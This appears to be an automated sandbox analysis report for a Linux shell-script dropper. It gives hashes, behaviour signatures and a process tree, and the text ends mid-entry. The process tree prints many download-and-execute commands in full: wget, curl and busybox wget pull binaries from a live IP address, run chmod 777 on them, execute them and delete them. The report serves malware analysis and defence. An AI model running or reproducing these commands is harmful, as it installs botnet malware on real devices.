Analysis
-
max time kernel
17s -
max time network
19s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
21-11-2024 08:23
Static task
static1
Behavioral task
behavioral1
Sample
c4daf483f2384fdf2bff7a1e016535e9a3cec0cbb1d46a6f00462421576db620.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
c4daf483f2384fdf2bff7a1e016535e9a3cec0cbb1d46a6f00462421576db620.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
c4daf483f2384fdf2bff7a1e016535e9a3cec0cbb1d46a6f00462421576db620.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
c4daf483f2384fdf2bff7a1e016535e9a3cec0cbb1d46a6f00462421576db620.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
c4daf483f2384fdf2bff7a1e016535e9a3cec0cbb1d46a6f00462421576db620.sh
-
Size
10KB
-
MD5
e77cba9c3f47d7b15e9b253d209804f8
-
SHA1
e918796e98f8176f36de6953579f1eeae1114726
-
SHA256
c4daf483f2384fdf2bff7a1e016535e9a3cec0cbb1d46a6f00462421576db620
-
SHA512
46df2a9573958d69d8541ecdeaab7084018aa20b20bd99c59fe032c3863deb132675b7dfa4a373fa1a929ec58a316e9e8d2709d0204b8fa0ad75f5ee0bd5ad77
-
SSDEEP
192:mfru7FtNOCTpJU7Z5Uy+Iv77jnd87HzD7V9caCOqjnh7gQBhhfv7XjndsHzDV9db:9y2LUR4
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 21 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 756 chmod 833 chmod 839 chmod 692 chmod 720 chmod 735 chmod 857 chmod 773 chmod 813 chmod 845 chmod 827 chmod 869 chmod 684 chmod 706 chmod 767 chmod 851 chmod 863 chmod 875 chmod 673 chmod 785 chmod 799 chmod -
Executes dropped EXE 21 IoCs
ioc pid Process /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 674 OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC 685 LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC 693 pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 707 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW 721 UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ 736 k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 757 Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 768 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci 774 Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 786 V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX 801 zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ 814 BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil 828 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff 834 PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 840 Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 846 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci 852 Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 858 V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX 864 zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ 870 BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil 876 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil -
Checks CPU configuration 1 TTPs 21 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 724 wget 728 curl 733 busybox 736 k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ 738 rm -
Writes file to tmp directory 21 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC curl File opened for modification /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 curl File opened for modification /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff curl File opened for modification /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci curl File opened for modification /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 curl File opened for modification /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil curl File opened for modification /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 curl File opened for modification /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 curl File opened for modification /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci curl File opened for modification /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 curl File opened for modification /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX curl File opened for modification /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil curl File opened for modification /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 curl File opened for modification /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX curl File opened for modification /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW curl File opened for modification /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ curl File opened for modification /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 curl File opened for modification /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 curl File opened for modification /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ curl File opened for modification /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ curl File opened for modification /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC curl
Processes
-
/tmp/c4daf483f2384fdf2bff7a1e016535e9a3cec0cbb1d46a6f00462421576db620.sh/tmp/c4daf483f2384fdf2bff7a1e016535e9a3cec0cbb1d46a6f00462421576db620.sh1⤵PID:647
-
/bin/rm/bin/rm bins.sh2⤵PID:650
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v42⤵PID:654
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:661
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v42⤵PID:670
-
-
/bin/chmodchmod 777 OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v42⤵
- File and Directory Permissions Modification
PID:673
-
-
/tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4./OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v42⤵
- Executes dropped EXE
PID:674
-
-
/bin/rmrm OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v42⤵PID:675
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC2⤵PID:677
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:680
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC2⤵PID:683
-
-
/bin/chmodchmod 777 LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC2⤵
- File and Directory Permissions Modification
PID:684
-
-
/tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC./LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC2⤵
- Executes dropped EXE
PID:685
-
-
/bin/rmrm LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC2⤵PID:686
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC2⤵PID:687
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:688
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC2⤵PID:689
-
-
/bin/chmodchmod 777 pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC2⤵
- File and Directory Permissions Modification
PID:692
-
-
/tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC./pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC2⤵
- Executes dropped EXE
PID:693
-
-
/bin/rmrm pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC2⤵PID:694
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX32⤵PID:695
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX32⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:699
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX32⤵PID:703
-
-
/bin/chmodchmod 777 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX32⤵
- File and Directory Permissions Modification
PID:706
-
-
/tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3./6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX32⤵
- Executes dropped EXE
PID:707
-
-
/bin/rmrm 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX32⤵PID:708
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW2⤵PID:710
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:714
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW2⤵PID:717
-
-
/bin/chmodchmod 777 UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW2⤵
- File and Directory Permissions Modification
PID:720
-
-
/tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW./UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW2⤵
- Executes dropped EXE
PID:721
-
-
/bin/rmrm UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW2⤵PID:722
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ2⤵
- System Network Configuration Discovery
PID:724
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:728
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ2⤵
- System Network Configuration Discovery
PID:733
-
-
/bin/chmodchmod 777 k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ2⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ./k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:736
-
-
/bin/rmrm k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ2⤵
- System Network Configuration Discovery
PID:738
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵PID:740
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:746
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵PID:753
-
-
/bin/chmodchmod 777 Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵
- File and Directory Permissions Modification
PID:756
-
-
/tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5./Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵
- Executes dropped EXE
PID:757
-
-
/bin/rmrm Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵PID:758
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵PID:760
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:764
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵PID:766
-
-
/bin/chmodchmod 777 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵
- File and Directory Permissions Modification
PID:767
-
-
/tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1./0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵
- Executes dropped EXE
PID:768
-
-
/bin/rmrm 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵PID:769
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵PID:770
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:771
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵PID:772
-
-
/bin/chmodchmod 777 Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵
- File and Directory Permissions Modification
PID:773
-
-
/tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci./Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵
- Executes dropped EXE
PID:774
-
-
/bin/rmrm Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵PID:775
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵PID:776
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:778
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵PID:782
-
-
/bin/chmodchmod 777 V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵
- File and Directory Permissions Modification
PID:785
-
-
/tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463./V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵
- Executes dropped EXE
PID:786
-
-
/bin/rmrm V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵PID:787
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵PID:788
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:792
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵PID:797
-
-
/bin/chmodchmod 777 zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX./zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵
- Executes dropped EXE
PID:801
-
-
/bin/rmrm zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵PID:802
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵PID:804
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:807
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵PID:811
-
-
/bin/chmodchmod 777 BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵
- File and Directory Permissions Modification
PID:813
-
-
/tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ./BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵
- Executes dropped EXE
PID:814
-
-
/bin/rmrm BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵PID:816
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵PID:818
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:821
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵PID:826
-
-
/bin/chmodchmod 777 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵
- File and Directory Permissions Modification
PID:827
-
-
/tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil./2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵
- Executes dropped EXE
PID:828
-
-
/bin/rmrm 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵PID:829
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff2⤵PID:830
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:831
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff2⤵PID:832
-
-
/bin/chmodchmod 777 PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff2⤵
- File and Directory Permissions Modification
PID:833
-
-
/tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff./PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff2⤵
- Executes dropped EXE
PID:834
-
-
/bin/rmrm PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff2⤵PID:835
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵PID:836
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:837
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵PID:838
-
-
/bin/chmodchmod 777 Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵
- File and Directory Permissions Modification
PID:839
-
-
/tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5./Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵
- Executes dropped EXE
PID:840
-
-
/bin/rmrm Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵PID:841
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵PID:842
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:843
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵PID:844
-
-
/bin/chmodchmod 777 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵
- File and Directory Permissions Modification
PID:845
-
-
/tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1./0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵
- Executes dropped EXE
PID:846
-
-
/bin/rmrm 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵PID:847
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵PID:848
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:849
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵PID:850
-
-
/bin/chmodchmod 777 Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci./Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵
- Executes dropped EXE
PID:852
-
-
/bin/rmrm Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵PID:853
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵PID:854
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:855
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵PID:856
-
-
/bin/chmodchmod 777 V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463./V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵PID:859
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵PID:860
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:861
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵PID:862
-
-
/bin/chmodchmod 777 zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX./zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵
- Executes dropped EXE
PID:864
-
-
/bin/rmrm zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵PID:865
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵PID:866
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:867
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵PID:868
-
-
/bin/chmodchmod 777 BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ./BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵PID:871
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵PID:872
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵
- Checks CPU configuration
- Reads runtime system information
